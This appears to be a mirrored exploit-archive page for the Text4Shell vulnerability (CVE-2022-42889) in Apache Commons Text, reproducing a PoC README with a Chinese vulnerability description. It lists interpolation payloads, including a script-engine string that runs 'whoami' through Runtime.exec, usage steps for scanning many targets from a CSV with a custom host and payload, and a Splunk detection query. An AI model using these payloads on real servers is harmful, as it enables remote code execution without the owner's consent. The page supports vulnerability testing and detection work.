Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-42889 PoC — Apache Commons Text 代码注入漏洞

Source
Associated Vulnerability
Title:Apache Commons Text 代码注入漏洞 (CVE-2022-42889)
Description:Apache Commons Text是美国阿帕奇(Apache)基金会的一个专注于字符串算法的库。 Apache Commons Text 1.5至1.9版本存在安全漏洞,该漏洞源于默认的Lookup实例集包括可能导致任意代码执行或与远程服务器联系的插值器,可能容易受到远程代码执行或与远程服务器的无意接触的影响。
Description
Text4Shell PoC Exploit 
Readme
# CVE-2022-42889 PoC
Text4Shell PoC Exploit, with ability to set custom payloads. 

## Payload

```
“${prefix:engine:input}”
Prefix available - “script”, “dns”, “url”
${script:name} ex - ${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}
${url:name} ex - ${url:UTF-8:https://domain.tld}
${dns:name} ex - ${dns:address|domain.tld}
```

## Intended Use
Usage of this script is limited to personnel who are authorised to run the payload on the target hosts for vulnerability patching purposes only. Prior to running this script, ensure you are authorised.

## Usage

```
git clone https://github.com/west-wind/CVE-2022-42889.git
python poc-cve-2022-42889.py
```

## Getting Started
This POC expects to receive all targets in a CSV file titled --> **allTargets.csv** with one column titled --> **targets**, containing all the targets that need to be scanned ex., http://12.23.45.67:9099 or http://spark.domain.com. The / will be added by the script.

Enter the payload to be executed on the target in the **POC.conf** file. 
Your host in    --> **yourHostHere** http://my_domain_here.com
Your payload in --> **yourPayloadHere** payload.sh

Made for research purposes.

## Detection Splunk Query
```
index=web sourcetype IN (nginx, waf_logs)
| eval actual=urldecode(_raw)
| rex field=actual "(?<payloadIdentified>\$\{(script|dns|url)\:[^\"]*)" max_match=0
| where isnotnull(payloadIdentified)
| table _time src_ip dest payloadIdentified status request url user_agent referrer
```

## Patching & References
[NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-42889)

[Sysdig Blog](https://sysdig.com/blog/cve-2022-42889-text4shell/)
File Snapshot

[4.0K] /data/pocs/a318e2bc3bcc90c43a22cf4b69b8ba5a4ce8d75b ├── [ 72] allTargets.csv ├── [1.0K] LICENSE ├── [ 77] POC.conf ├── [1.9K] poc-cve-2022-42889.py └── [1.6K] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.